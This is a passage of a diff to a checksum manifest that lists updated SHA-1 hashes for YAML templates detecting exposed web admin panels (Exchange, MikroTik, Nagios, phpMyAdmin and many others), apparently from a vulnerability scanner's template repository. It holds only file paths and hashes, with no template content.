-http/exposed-panels/microsoft-exchange-panel.yaml:11adf54da092d2e63804541767f06224a830c4a4 -http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml:305a045131b9ca81c700a79e0af7eea801440d69 -http/exposed-panels/mikrotik/mikrotik-routeros.yaml:dd9cf9ecc0ab355d2c3cdc748f77443cd796f24d -http/exposed-panels/mini-start-page.yaml:22f59a2c2a9bded60918ecdbc63c1f65b9cdca62 -http/exposed-panels/minio-browser.yaml:33a971f047b3651cd73434316b4f9f80f9c6b40b -http/exposed-panels/minio-console.yaml:849ad2f0bd7fb6c68599bbe9290229c5917eeb26 -http/exposed-panels/misp-panel.yaml:b9a52b0035d57ced9ca7f769b976fc6f88b3a011 -http/exposed-panels/mitel-micollab-panel.yaml:240a8681b74e96a23f60e0c9ec97a398253803fa -http/exposed-panels/mitel-panel-detect.yaml:b07997d5b9e108aa1acc65b2700d15fd901773d1 -http/exposed-panels/mitric-checker-panel.yaml:340dc25b45b7a2a796604c2b7950a6aa748e94af -http/exposed-panels/mobile-management-panel.yaml:6a67938c36dfecf8ab566400b9459f118277ffdc +http/exposed-panels/memos-panel.yaml:6df4ff7f9a490b97a9dd3f1c4b5eb75442b53205 +http/exposed-panels/meshcentral-login.yaml:f994d53cc5229ada4f1fba865e9794c60cebdab6 +http/exposed-panels/metabase-panel.yaml:efad7cd6049dce1c98ab6be696340fbc9396d63c +http/exposed-panels/metasploit-panel.yaml:1b2e8dd010f2c0c9f9fdba3e1fbc124b65d9c5fd +http/exposed-panels/metasploit-setup-page.yaml:bb9a5ee63c4c42af094fc49793234d48568c7ce9 +http/exposed-panels/metersphere-login.yaml:5b1e80dead291aec8e847558015685ca85fef252 +http/exposed-panels/mfiles-web-detect.yaml:4194ca0015960fb7628026232000375c2f2a88ef +http/exposed-panels/microfocus-admin-server.yaml:d24f4241139c80495ed0755353564f9f43700f07 +http/exposed-panels/microfocus-filr-panel.yaml:e98071e9fab361922e29af53e797ac4a33d63db9 +http/exposed-panels/microfocus-lifecycle-panel.yaml:afdf0b418faf456973652d4d015ac2b639182119 +http/exposed-panels/microfocus-vibe-panel.yaml:aec100b174ab0375cc637854e7a7200afc368c10 +http/exposed-panels/microsoft-exchange-panel.yaml:c89661f32df58fe6abea0535567454eeb40c3b2b +http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml:12caea90e6ecf33df3eab8ac9a9336f9b16a3bcb +http/exposed-panels/mikrotik/mikrotik-routeros.yaml:5d2c9116b155a72abb6fe3f31f0432b27288e95e +http/exposed-panels/mini-start-page.yaml:b9e501b7a9ced26ac4e0f5e66c2ee2a19f96c307 +http/exposed-panels/minio-browser.yaml:b4f22b1d939447207738662ed5a8d370e35b73d0 +http/exposed-panels/minio-console.yaml:6f6cf5e66dbb48a5137696b6c757aaec8b8ab001 +http/exposed-panels/misp-panel.yaml:f3080806e0a56b0036ec5f80f7f5bb72a7c6f36b +http/exposed-panels/mitel-micollab-panel.yaml:d08040bbe9fe7727f8c8ba1b2320fdc8b977ef30 +http/exposed-panels/mitel-panel-detect.yaml:08a9adc217aeac6b8ef813be2774d8cae11dc82d +http/exposed-panels/mitric-checker-panel.yaml:94dde7a1c2d507da3f6f2fafe1295c92b6021141 +http/exposed-panels/mobile-management-panel.yaml:7430696d5f32be46f0c3d9e398b2b1e5bbc84b6a http/exposed-panels/mobileiron-login.yaml:2795a03e2aa407d6aa2620bd859309587cacbe6f -http/exposed-panels/mobileiron-sentry.yaml:758f0250a4d05db4ea0b55ef09cee2f613f4842f -http/exposed-panels/modoboa-panel.yaml:dc1119a48b640577160e90dea784d9942d48dece +http/exposed-panels/mobileiron-sentry.yaml:b8a85aa5b6c84815bbd82bb56e5a79afbd1e6218 +http/exposed-panels/modoboa-panel.yaml:ac577051d3e1a0d8952ccaf21726d1ccbf376e62 http/exposed-panels/mongodb-ops-manager.yaml:93d1b7adf65fc1472b0c9e7e4bb9850437808a42 http/exposed-panels/monitorix-exposure.yaml:f9891feabc80074870d3bdab2f63a97e609d2e0c -http/exposed-panels/monitorr-panel.yaml:be76851062e5fcf5dc9f60f31eaac23695302356 -http/exposed-panels/monstra-admin-panel.yaml:0a09348d2715473f4f8979948db45bbc52b49793 -http/exposed-panels/moodle-workplace-panel.yaml:50150a265d42af27a0a39a8d973235b509dc095d -http/exposed-panels/movable-type-login.yaml:508709af62f02d5ef93ae76aec1011e33ed96bb9 -http/exposed-panels/mpftvc-admin-panel.yaml:27d2315c408e5c841b919dd79179b3f258fff0ed -http/exposed-panels/mpsec-isg1000-panel.yaml:502b156e58d8ec3d292c50a100686eca248af616 +http/exposed-panels/monitorr-panel.yaml:8141d07317c926d70b7ca10d348b3e20950fd218 +http/exposed-panels/monstra-admin-panel.yaml:39c99ca4fee0d6535b86471fadd6010dc46d5673 +http/exposed-panels/moodle-workplace-panel.yaml:69e936c3e3bc08f5acfd85326b1d2663fd48815f +http/exposed-panels/movable-type-login.yaml:78708fafd900c80a105db51e3e58d7cf361d70fe +http/exposed-panels/mpftvc-admin-panel.yaml:c4ec0445fa0c133ab0a9e171ee458bd42df9b37d +http/exposed-panels/mpsec-isg1000-panel.yaml:50c12be2773cb159feb035e11d0378e93c8c6a8f http/exposed-panels/ms-adcs-detect.yaml:1ab74132704c2624f19daf5aa4e91de02d43b631 -http/exposed-panels/ms-exchange-web-service.yaml:63763b42dba4a1a1a733772a1432013fc9364438 -http/exposed-panels/mspcontrol-login.yaml:d381675b12cdce4fe5f104c4e3b114387242a74c -http/exposed-panels/mybb/mybb-forum-install.yaml:764347d8fe87bdd580b7f5fec9dcc60b90c0aa25 -http/exposed-panels/mybb-forum-detect.yaml:4952dbcff061cad8b74587f35167a1f4f1229031 -http/exposed-panels/mylittleadmin-panel.yaml:877ecb616dac31ac0a797d7442aa0d73c3a27213 -http/exposed-panels/mylittlebackup-panel.yaml:aeca8bc7bb4148c692ec3ca9dc0234b20fdb4847 -http/exposed-panels/mystrom-panel.yaml:5c96e157c04f47c7dbb0dc608022cc6b9ffd5a82 -http/exposed-panels/n8n-panel.yaml:9d42e6a43dd7de68c76bf38cfd681275147517e5 -http/exposed-panels/nagios-panel.yaml:0c1f3fc739fa86cf129cb05c6f8a2a3c10b151d6 -http/exposed-panels/nagios-xi-panel.yaml:1b0b6e992805420d16f23c964decfec9e9962138 -http/exposed-panels/nagvis-panel.yaml:ba54ad10ecee829efd444c6c975cac871ddd03ad -http/exposed-panels/navicat-server-panel.yaml:30d930847e50352603a902490522a7a4019791bf -http/exposed-panels/ncentral-panel.yaml:b8b8df7342ac7151a3743084377206e98346992a -http/exposed-panels/nconf-panel.yaml:cc671899a79ce08f54ffde080c8da95f2efe4377 -http/exposed-panels/neo4j-browser.yaml:7127a0865d36cbf9ae26b99297c66ee34037a5ad -http/exposed-panels/neobox-panel.yaml:5823ab763c11263a9c7626f86039b69e9970f92b -http/exposed-panels/neocase-hrportal-panel.yaml:6670efb802087510084c1e5dbdc8844d721ef13d +http/exposed-panels/ms-exchange-web-service.yaml:c9619e38a6c4674a178a7d2d85382e86de35e037 +http/exposed-panels/mspcontrol-login.yaml:979f20c49d7cd023c09f747e6c6820415f9cd627 +http/exposed-panels/mybb/mybb-forum-install.yaml:9c94e76d311e07d8f108ff38a3e7bf2024e6f9b3 +http/exposed-panels/mybb-forum-detect.yaml:ef602c9cc245c809b2321377ffb39e9c5b7ac9f3 +http/exposed-panels/mylittleadmin-panel.yaml:d63927eeea78fb027de8fadb656054fc9b906816 +http/exposed-panels/mylittlebackup-panel.yaml:93649a5491b9f53f404661e0753025f8bcdcce08 +http/exposed-panels/mystrom-panel.yaml:675d99157e8d586aaa5b8c5bd7c51d1cf4bfc43f +http/exposed-panels/n8n-panel.yaml:d423ec5e574e928f86371b2d5884dcf60530ad13 +http/exposed-panels/nagios-panel.yaml:63ae9eddecad5a2a0f03007332a767ee8e8623e2 +http/exposed-panels/nagios-xi-panel.yaml:46129284b0fd9729f3ad81fa00207291ee53ae5c +http/exposed-panels/nagvis-panel.yaml:77653e40b712501956916416b124bf0a3fe02be6 +http/exposed-panels/navicat-server-panel.yaml:d61015c859ea2d575776379a53a70c43fc7bbb7f +http/exposed-panels/ncentral-panel.yaml:ee345126ad91b7568e4876db933682d1d5e14564 +http/exposed-panels/nconf-panel.yaml:9d452b0177b441f4f0edd02672e43d5a69e7396b +http/exposed-panels/neo4j-browser.yaml:c1581db5dc18efc9e73977312fe589a255ce949c +http/exposed-panels/neobox-panel.yaml:f0f10c365d09b7e33b160f6e576e3a895a163eeb +http/exposed-panels/neocase-hrportal-panel.yaml:0e854db61ab9c8a2e9b386578f8ac6f2901329f9 http/exposed-panels/neos-panel.yaml:ec8d3f124197d8cd2d1ff367310365a62e0420a2 -http/exposed-panels/nessus-panel.yaml:a82359cb79453a9939666062f522bfc546909874 -http/exposed-panels/netdata-dashboard-detected.yaml:34e050ec70f2c6a79194c71d6d7768f2ce16b6d5 -http/exposed-panels/netdata-panel.yaml:a8c1752ab8603c772265d34a905990866e90c5bf -http/exposed-panels/netflix-conductor-ui.yaml:0dff3c201e50e96b4dcc660ce61e2a61782f6a20 +http/exposed-panels/nessus-panel.yaml:0f44b488ac357d53d5c6219a990bf74373635210 +http/exposed-panels/netdata-dashboard-detected.yaml:f0bd009b89fa2c5f981e2cddfbc788963c8ba376 +http/exposed-panels/netdata-panel.yaml:d3cde9ffed6a0ac075262b204e49035bd83361a0 +http/exposed-panels/netflix-conductor-ui.yaml:1d57b85c6f4bb5d4e358cc40eafe4cdd2d7ae4a2 http/exposed-panels/netgear-version-detect.yaml:1f15ea1787f6da7ace19e6d13e2ea8d313389c3c http/exposed-panels/netis-router.yaml:37a842ce9b050b0adf42caa1683e033cf9f3cf27 http/exposed-panels/netlify-cms.yaml:52f77df2c632a0b49af6f01e67f69347308dc73a http/exposed-panels/netris-dashboard-panel.yaml:53082539f3e6021174c2d0c07a47c947ca431659 -http/exposed-panels/netscaler-aaa-login.yaml:54b265bd78107b40ff7b88241e4f5b4e3ec2b6c5 -http/exposed-panels/netscaler-gateway.yaml:5c1eba07db0920fce2faf0765af99d6e835f6571 -http/exposed-panels/netsparker-panel.yaml:bda43642097cc23a68a06f87ff9e42f7b5c38486 +http/exposed-panels/netscaler-aaa-login.yaml:a1c7b917422b539a2e5b59a3e3508c9ba9fbf3bb +http/exposed-panels/netscaler-gateway.yaml:8d30f7e9595bc6756dae508f76ebbf1bc4baa8b1 +http/exposed-panels/netsparker-panel.yaml:f7de4684ef247a6504e3f4cd2ba219da874a38d3 http/exposed-panels/netsus-server-login.yaml:7458b5c53ddd54f88b9140e893828568fd7f5c85 -http/exposed-panels/nexus-panel.yaml:4719ca26f8ca0070fa2329b344b10e6d27ce8ffc -http/exposed-panels/nginx-admin-panel.yaml:492c1a52a4892201610677d018a5bccc85174961 +http/exposed-panels/nexus-panel.yaml:71e104e284d64f1d36020111874b49a9c251e33f +http/exposed-panels/nginx-admin-panel.yaml:b3218dcf95e3064da4ecd4a6320e14ee28a47cbb http/exposed-panels/nginx-proxy-manager.yaml:cbe5a23f32c9f95f9e4a914c4cf17d92c70ef5b5 -http/exposed-panels/nginx-ui-dashboard.yaml:1fc5b05816c393f8b7a6dbda82809da081e770af +http/exposed-panels/nginx-ui-dashboard.yaml:002c8f54ee5b4ac3e34cf3400744f1962a05e84c http/exposed-panels/ni-web-based-panel.yaml:1757bfbe129e69cbceae933ba2e363a706722866 -http/exposed-panels/nocodb-panel.yaml:0519137744c936f9cff62dcf92e8b5885a9fef04 -http/exposed-panels/noescape-login.yaml:7dae2defb736e4a2e4f595cd60ee6afbd8da2814 -http/exposed-panels/nordex-wind-farm-portal.yaml:e6fd0977f64c3aa20c3e94134e2e617ef221fde3 -http/exposed-panels/normhost-backup-server-manager.yaml:4ea654fd59759fc5b6fb404e3967142c7c5150c8 -http/exposed-panels/novnc-login-panel.yaml:5b95aaaa3c9a94831911bc1d4a212d3049288f52 -http/exposed-panels/nozomi-panel.yaml:fc29f180b0c5462ff506dd3484bff0fbf496f14a -http/exposed-panels/np-data-cache.yaml:525d68648699412c03acbd631d4c686a4f6b0478 -http/exposed-panels/nport-web-console.yaml:134950fa918c1bc3c3bb80d59a2b9b2190b3fbb0 -http/exposed-panels/nsq-admin-panel.yaml:fc2d72f70858b3ab8b99d03129106b6577a5cc02 +http/exposed-panels/nocodb-panel.yaml:ffc943fe01108681605e9b7d6de1337135224741 +http/exposed-panels/noescape-login.yaml:0b3c5482be852097436f3752c7b8bef46af30ea4 +http/exposed-panels/nordex-wind-farm-portal.yaml:47bbe33f1f70fbf777f7de634d2450980fe2ec4f +http/exposed-panels/normhost-backup-server-manager.yaml:748e55d91f0987a7b2142bba16382709a55797fe +http/exposed-panels/novnc-login-panel.yaml:8a00e069e684b8f8ea61b1ee56cdca135d74ac93 +http/exposed-panels/nozomi-panel.yaml:cc1d92bfc2685da1d80ea2c9d96c369165df21bf +http/exposed-panels/np-data-cache.yaml:3cee24c30bedb32a2a1af3af957d88d233cbedfc +http/exposed-panels/nport-web-console.yaml:82faafddaae5e8bf8bc99268b3679f5c97183e11 +http/exposed-panels/nsq-admin-panel.yaml:4b882a1589530a4f2030790caf4a7d0b2927a8ac http/exposed-panels/nutanix-web-console-login.yaml:df6a3a4083d72a140d99aa157d5a330962691234 -http/exposed-panels/nuxeo-platform-panel.yaml:1c2ebdd3c202a88a2e6f1f725a230130d295fe10 -http/exposed-panels/nzbget-panel.yaml:918c95945d5b35b3152c04b7ac99d35841abda3a -http/exposed-panels/o2-easy-panel.yaml:73d15a1776248b2c80af4776e91659b7023285fd -http/exposed-panels/ocomon-panel.yaml:debb238d884ba46db07c57fb6cabf0bc27b197bc -http/exposed-panels/ocs-inventory-login.yaml:eb90728c784032933ae1975d6aad62f4c7c21e25 -http/exposed-panels/octoprint-login.yaml:8f1865963be6d93361feefab2967074bd56f0e20 -http/exposed-panels/odoo-database-manager.yaml:ade12916c0afae20ac634fb3dcd59eb8d7d44d53 -http/exposed-panels/odoo-panel.yaml:bf3515e59904845af2b1695a856dec8034cd6dee -http/exposed-panels/office-webapps-panel.yaml:b592adde270812ffe4baae1659ac865dc01713c2 -http/exposed-panels/officekeeper-admin-login.yaml:6712508c6239aa0834c490af2f30055b0207d264 -http/exposed-panels/oipm-detect.yaml:66f7d1405f8141ba0abbb1ad6c8a32d850450ce6 +http/exposed-panels/nuxeo-platform-panel.yaml:8c8f67e10579f31f036c2445c484226aba803a69 +http/exposed-panels/nzbget-panel.yaml:e33cbcd6d41712d2278c52fcfdc5caf67d0b4a28 +http/exposed-panels/o2-easy-panel.yaml:8f4eaf111795fe7f8b2cca2e2191458dcf91935d +http/exposed-panels/ocomon-panel.yaml:ca820eaab46a62e5fc2c753169dac803a5c1e740 +http/exposed-panels/ocs-inventory-login.yaml:3081e28e073a4f169de81de9cc0ba506985bb2e8 +http/exposed-panels/octoprint-login.yaml:9080fb7bc71b2c383b2d9de5423abdb12cd5b7df +http/exposed-panels/odoo-database-manager.yaml:037c89e1ff9f7694cec2a7a354c2d3321f279707 +http/exposed-panels/odoo-panel.yaml:cd3d2c54eeae9d6aae9ad8a800cb3c7b51c7e3d6 +http/exposed-panels/office-webapps-panel.yaml:6c63d0c45374c5a370095ff2f2cd835fb33eaf72 +http/exposed-panels/officekeeper-admin-login.yaml:48776c65677c557b2a2c059a77306bc8e91bcd15 +http/exposed-panels/oipm-detect.yaml:ca1eed07e7c1822540a91792e952723bc34d28c3 http/exposed-panels/oki-data.yaml:916926204d9d0baad24e04f9a217e4a03af5ebe4 http/exposed-panels/okiko-sfiler-portal.yaml:2e8e6212d4385e6af1a12f221aadd7f27e0dc856 http/exposed-panels/okta-panel.yaml:64fa8108ebfc1fd6095fdc94addba67aefdb8547 http/exposed-panels/ollama-llm-panel.yaml:d19589a85d32d242a50066ba2676a6ed2f6ad498 -http/exposed-panels/olt-web-interface.yaml:c11decab3fb75348f55d1795e6fdccbfed5b0836 -http/exposed-panels/omniampx-panel.yaml:d0f0c1f07e83e51ba172eadf5754b31fd984c858 -http/exposed-panels/onlyoffice-login-panel.yaml:11108a7660fd7278b526cae46e88b859add6b807 +http/exposed-panels/olt-web-interface.yaml:029adc5fdd82494d3714c49094637f64c21c0fdd +http/exposed-panels/omniampx-panel.yaml:94d17405d7b9357e6129d12387715508b4004406 +http/exposed-panels/onlyoffice-login-panel.yaml:2f439d6f123ca04df17073347bfbbb9d47d5cec2 http/exposed-panels/open-game-panel.yaml:59efeff7e08a70e689ab77521a82be8e41709028 -http/exposed-panels/open-stack-dashboard-login.yaml:fe92fee3bfff5b6cb12ad255931fd98dc3bc14bc -http/exposed-panels/open-virtualization-manager-panel.yaml:b93260224f932f78076621129ecbb7eac9fd81eb -http/exposed-panels/openam-panel.yaml:671d5bafe0d01112ec8c152d5b688f00e9dbd7b4 +http/exposed-panels/open-stack-dashboard-login.yaml:2251e6433b7726ea3568bd7639a5364a8f64d2eb +http/exposed-panels/open-virtualization-manager-panel.yaml:e17894edaaff390d2d8241d0e0aded446304f74b +http/exposed-panels/openam-panel.yaml:eb2052dcb5e1f4cddb0e9d6fa24ecb7925cc346d http/exposed-panels/openbmcs-detect.yaml:2292b4e9709678ec63cff1100da7443df6599004 -http/exposed-panels/openbullet2-panel.yaml:614cfa8ef95c5b2bed38b3ac3aaeee4e1729a84f -http/exposed-panels/opencart-panel.yaml:5a6b5729dbbe7de3e8e421fca1662d797b308921 +http/exposed-panels/openbullet2-panel.yaml:eec0fc3ab011c9946fb8edbb7463d3d599014456 +http/exposed-panels/opencart-panel.yaml:5b11231807d199048c41e4f850a439f69beff673 http/exposed-panels/opencast-detect.yaml:f6877013be4f0aba543e20f10cb710ba35dcfcd4 -http/exposed-panels/opencats-panel.yaml:dbfabf263269a132904f9a3ebb9c1254669aae51 +http/exposed-panels/opencats-panel.yaml:6cb9bb3bb205a57ee47140d2d5a5d7e2daa29255 http/exposed-panels/opencpu-panel.yaml:a48c6768a838e2418f0fc4d5794c6bd7587eb57d -http/exposed-panels/openemr-detect.yaml:35878673c0ada4d5d871364e46c6ce7e2c0d241c -http/exposed-panels/openerp-database.yaml:3267a871614d3f82b04e4ad7a6e13dfd7852bea7 -http/exposed-panels/openfire-admin-panel.yaml:2eb09a1dbf6d9634fbb2cc8832e1a4e325275c3e -http/exposed-panels/opengear-panel.yaml:0f7e871e1799ffa1c9e02007f6f99896a710bb39 -http/exposed-panels/opennebula-panel.yaml:2c851d1d8d75e50f3ff07948ece173b8ce48e638 -http/exposed-panels/opennms-web-console.yaml:476f7373cf66bbd422426f160dd6f761e53c5b52 -http/exposed-panels/opensis-panel.yaml:7a2b6f0a5b05e15204d6ba9ddf2fa33c67f7d835 -http/exposed-panels/opentouch-multimediaservices-panel.yaml:9fa30966eefae97b03b6b59e6ccb3ead3cdf5e0f -http/exposed-panels/openvas-panel.yaml:28214c4b3218d04fbd67dd9ab60dd6a9439b78e7 -http/exposed-panels/openvpn-admin.yaml:863464ff8ba2a29e03dc8878e226d1327dca2ab9 -http/exposed-panels/openvpn-connect.yaml:92b51be8820e8d19dcab982f32e889e0ac84fc05 +http/exposed-panels/openemr-detect.yaml:94edc02c899dbd56b9484c5bd25a8242963c4fb2 +http/exposed-panels/openerp-database.yaml:1e182e703e3492d5f7678c4c5105e374eb1c2425 +http/exposed-panels/openfire-admin-panel.yaml:49cea49fc704dc5f78ebc70fdc3c76acb2d906a9 +http/exposed-panels/opengear-panel.yaml:8cf51223cdaab364bcfd38416d794f10aea85fde +http/exposed-panels/opennebula-panel.yaml:38f44bd8ab3be4fd099e8528f921d3ad621c3f12 +http/exposed-panels/opennms-web-console.yaml:5be7e698fd0df112a8b214160797c75bc63375c0 +http/exposed-panels/opensis-panel.yaml:a76ca206b65ac9f71aca222857d6ee86fa654796 +http/exposed-panels/opentouch-multimediaservices-panel.yaml:f886bcf9235a5657eb2df98baf57f95ea122a3ee +http/exposed-panels/openvas-panel.yaml:37d20068a7dcbda8b23d01a1f994c87e58e8ee98 +http/exposed-panels/openvpn-admin.yaml:21ab0b8ff6e844291175b8c8d1977c974fdcc449 +http/exposed-panels/openvpn-connect.yaml:cf9eb38c6c496d1e464dc2ec0e74b0f9978de638 http/exposed-panels/openvpn-monitor.yaml:8bdcaa711f6852aeae49b0dde458dd17ed94f146 -http/exposed-panels/openvpn-router-management.yaml:4c372e21e9ecc176fd0e9edd4fa3195012d17bbf -http/exposed-panels/openvz-web-login.yaml:37b140070fa9fc0fc6ff0b5d95fbb7b6dd660aa6 -http/exposed-panels/openwebui-panel.yaml:796f6949f34bdd706906d64b112519415f6cf396 -http/exposed-panels/openwrt/openwrt-luci-panel.yaml:23c9398019d54040ec5ec64239b8ef54ad683c06 -http/exposed-panels/openwrt-login.yaml:99bc6770cd1dd9318d0575323ac32f92e4d8ff88 -http/exposed-panels/openx-panel.yaml:1d6be9b221101c2f1fc724e0273450075e0c46e6 -http/exposed-panels/opinio-panel.yaml:6f9232a1cd33bd4b348c6274cdd2436d7eb04405 -http/exposed-panels/oracle-access-management.yaml:4891f0dc43e639073cfad415a15f31fba0274ea5 -http/exposed-panels/oracle-business-control.yaml:3db90a4292199b50c9375bb0e90a3de3942f9f46 -http/exposed-panels/oracle-business-intelligence.yaml:4f19eda18cffc99d834727c4aa620adeb4a2e486 +http/exposed-panels/openvpn-router-management.yaml:414d6579e300cad6d3393ba93f28cdadc8d662b5 +http/exposed-panels/openvz-web-login.yaml:093ed9de70c758d05edb36313fe0f691698d44d9 +http/exposed-panels/openwebui-panel.yaml:66953ea37027743b84f8166f931277f0f40a1590 +http/exposed-panels/openwrt/openwrt-luci-panel.yaml:40c17051e2bf9582aba58554dcc8b47236992d29 +http/exposed-panels/openwrt-login.yaml:bf71548bd02ddda858eee7c9c81b2d605160fadd +http/exposed-panels/openx-panel.yaml:9a251ee72f83a54066ea4b66477e0315e3738f62 +http/exposed-panels/opinio-panel.yaml:876bd7c1d066c2fa315ac4e97b8068cdde971194 +http/exposed-panels/oracle-access-management.yaml:58d21f281579879b938eecf90ac9aa0dff636cdd +http/exposed-panels/oracle-business-control.yaml:49cc7edb62c2ed58e0fcbe8d166d5333a610f00d +http/exposed-panels/oracle-business-intelligence.yaml:9c840a9a52a59d64cd21e8af03436a47baa19e42 http/exposed-panels/oracle-containers-panel.yaml:5ff1a1b8e8025efcd64744c2f89e9cc2132b40d1 -http/exposed-panels/oracle-ebusiness-panel.yaml:6e0870f35289ffd8ffb69a3bf83b04ff116a95b0 -http/exposed-panels/oracle-enterprise-manager-login.yaml:76e328b658d117d5c45bd8f8f0114d5efff5ba2a +http/exposed-panels/oracle-ebusiness-panel.yaml:11ce5f8eac0d77689fffc78b24824a09e59d3002 +http/exposed-panels/oracle-enterprise-manager-login.yaml:4f6034321a1adc54248243fbccd919294a01216e http/exposed-panels/oracle-integrated-manager.yaml:33fabda935c2ddc490939f8e5d5abc27fd5f1f49 -http/exposed-panels/oracle-opera-login.yaml:1a1e64aebaeb4635b85cfcdfe7f88b1856e35c3f -http/exposed-panels/oracle-people-enterprise.yaml:1d99296ada4cbb377939cfb07a4171a2569d36ea -http/exposed-panels/oracle-peoplesoft-panel.yaml:eb9fba3f40daeaa613feb341a707ac588a667514 -http/exposed-panels/orchid-vms-panel.yaml:ea0e836bcb094ab56245bb733490e2c210fdba72 +http/exposed-panels/oracle-opera-login.yaml:76d5bec17469179407128b639e474e0769ee2af0 +http/exposed-panels/oracle-people-enterprise.yaml:289ef46924d2998368c9c28247abb68160cefb26 +http/exposed-panels/oracle-peoplesoft-panel.yaml:0ddd04a11303ed51591ea5f63d295b9d4c047ee8 +http/exposed-panels/orchid-vms-panel.yaml:26907797826f5fd112ab68de00af9d047536a064 http/exposed-panels/osnexus-panel.yaml:1397581ae2c1d7c2943eac8291ce75e8444bcf09 -http/exposed-panels/osticket/osticket-install.yaml:622ae6b555a887e823b9252eb9509ffb1b7d155f -http/exposed-panels/osticket-panel.yaml:5080f0bbae6db72438bafd30e5fbda0485f687d8 +http/exposed-panels/osticket/osticket-install.yaml:6765bbacebe94aa7989e0917ee0ad7d5e555674b +http/exposed-panels/osticket-panel.yaml:43928fa4db2ea3f8e4974c4a20885ad52c8ccbdc http/exposed-panels/otobo-panel.yaml:312246ef4c251b722091e452d581f427551204ff -http/exposed-panels/ourmgmt3-panel.yaml:943d095daeff8ea5a8ca0f4931e245404597fbac -http/exposed-panels/outsystems-servicecenter-panel.yaml:1d56be5a96950beb5ec242b1fc27ff3ec66397d7 -http/exposed-panels/overseerr-panel.yaml:3e81b036607b1522e5ebb9403f6b721fdae7ae84 +http/exposed-panels/ourmgmt3-panel.yaml:a6036af7f001f941556e5b83bf2ac2ed3fe04500 +http/exposed-panels/outsystems-servicecenter-panel.yaml:9a8a06260f21595dade6ffb65a9e5317d849d655 +http/exposed-panels/overseerr-panel.yaml:9f4f4767aaa56fb0dba40fb7d3feaeb064b5b689 http/exposed-panels/pacs-connexion-utilisateur.yaml:b76d85aa17275933bfee31bd63d62a36e8c050e0 http/exposed-panels/pagespeed-global-admin.yaml:96c612151fc6efa226c0ebbf6d440609dba39ff7 -http/exposed-panels/pahtool-panel.yaml:73ac49ccfc6dc977566de9faa838562bea78b0e8 -http/exposed-panels/pairdrop-panel.yaml:867e12cc53a5e416196ff47584a23ec198a8a0ff -http/exposed-panels/panabit-panel.yaml:3a8cc37156275059fdf871aa812539a642c0c8a4 -http/exposed-panels/pandora-fms-console.yaml:d6e68ef197766d748824db74a48787f1cebc5888 -http/exposed-panels/papercut-ng-panel.yaml:2ec7df714f0891805f4264b8774437f2be2d9cb7 -http/exposed-panels/parallels/parallels-hsphere-detect.yaml:b26ea3a9158039be4679c2eada8786b4f3efe148 +http/exposed-panels/pahtool-panel.yaml:ee041dadd5251cfcd786e539930da51848370fce +http/exposed-panels/pairdrop-panel.yaml:dc6f595eb481147e646230dc1fd3f6dfcba33d69 +http/exposed-panels/panabit-panel.yaml:5bc58c25a3debee9a0f025f3113591061d21d78f +http/exposed-panels/pandora-fms-console.yaml:93fb60c2b2f8d716ae6a03062523495004d05aa0 +http/exposed-panels/papercut-ng-panel.yaml:8afb370eec63bc4a195262614158bf43ced1d304 +http/exposed-panels/parallels/parallels-hsphere-detect.yaml:21a896aa4d7a3c8942bc4333ce50226fde9268d5 http/exposed-panels/parallels-html-client.yaml:c42097fc61369b15b2b52f6a439d183ff165a8d4 -http/exposed-panels/parse-dashboard.yaml:72fe01a202cd793585a1c0b8f40a01983a4df376 -http/exposed-panels/passbolt-panel.yaml:810a71d864be37c47da59326726455ca74163532 -http/exposed-panels/payroll-management-system-panel.yaml:92b1bd2d1ec5439384d8dd99bb48e4fe8fc17d08 -http/exposed-panels/pdi-device-page.yaml:da267a033a818521a09c794011a14635f1b23e98 -http/exposed-panels/pega-web-panel.yaml:32120243a50be90f8003ebbb22d410d3d24245f3 -http/exposed-panels/pentaho-panel.yaml:69c3d32fdfe82a720c142d426c71ee5644884fb3 -http/exposed-panels/persis-panel.yaml:a08f5599d7d514973b6c577aa4441d8c69e9ead4 -http/exposed-panels/pfsense-login.yaml:bb0c6f2fb9084a7e2540134a7e9c3b8ed559f7cf +http/exposed-panels/parse-dashboard.yaml:31ee52e3b0aeebf25a2e4140e35060a0e5f393d2 +http/exposed-panels/passbolt-panel.yaml:12b364fc011ccdef5f8957c1c89669a0211db657 +http/exposed-panels/payroll-management-system-panel.yaml:6c8aa792573bcac91fee77bd750e1f9109813dd4 +http/exposed-panels/pdi-device-page.yaml:2eee00767e2e63f054894f6718e14d6429b3d3d9 +http/exposed-panels/pega-web-panel.yaml:bcbca900d857f787bab8139cee11edcbace1d1bb +http/exposed-panels/pentaho-panel.yaml:d73c03b3895dcd764e7d3348960023b410c26a99 +http/exposed-panels/persis-panel.yaml:6d34a0d2e8e09e65768c6f5c0fd9b713d6f35335 +http/exposed-panels/pfsense-login.yaml:3f200f8c64a598dd52ee1bab2287059c22a82626 http/exposed-panels/pgadmin-exposure.yaml:9223165b5f174a75d355a3e88d1df4c0d37e3040 -http/exposed-panels/phabricator-login.yaml:c949f3afb252a1e6c6a43efcf090a924362eedcf -http/exposed-panels/phoronix-pane.yaml:baa4a4e07248a1b8cc22201eedf2e12c0bf03e7c -http/exposed-panels/php-mailer.yaml:aea625363805a59d157fc0c8fbd98520a658bf37 -http/exposed-panels/phpcollab-panel.yaml:00191ff5433780217091e63a42f9a512150ea763 -http/exposed-panels/phpldapadmin-panel.yaml:6a326c69ae4087643893609ba63387f5f616cb80 -http/exposed-panels/phpminiadmin-panel.yaml:18f7bdeebcddc43b09d75b6430ad561859f97d14 -http/exposed-panels/phpmyadmin-panel.yaml:3ceb853a63f8eb7cbf4c231b0c4f7dbb067f66e6 -http/exposed-panels/phppgadmin-panel.yaml:b644fb2f3c82f4cf2e6acc48ed9502547d0dabe3 -http/exposed-panels/pichome-panel.yaml:de9c307297bd6bee1395daea5bf78a75d03462c4 -http/exposed-panels/piwigo-panel.yaml:3bdd638ad47c8660f72afd63183653e1bbc01788 -http/exposed-panels/planet-estream-panel.yaml:2009a89ab2b04c4c2b60db61aba35ffea979b145 +http/exposed-panels/phabricator-login.yaml:5d45ed424f58442e7f0f53edd2c4b87e759d8f6a +http/exposed-panels/phoronix-pane.yaml:a9a3e08c0fc8ededb26f119ef48c8fc0aed4417b +http/exposed-panels/php-mailer.yaml:6484a829a40e67612555caf176d3a2e14d9667c5 +http/exposed-panels/phpcollab-panel.yaml:e790b33af60f820b742ccad3078a0b89b3afbb23 +http/exposed-panels/phpldapadmin-panel.yaml:e911cef61404fbbea367f720eacd1fed74e98946 +http/exposed-panels/phpminiadmin-panel.yaml:633c836d1f5f01f06973841438eb97a831501b71 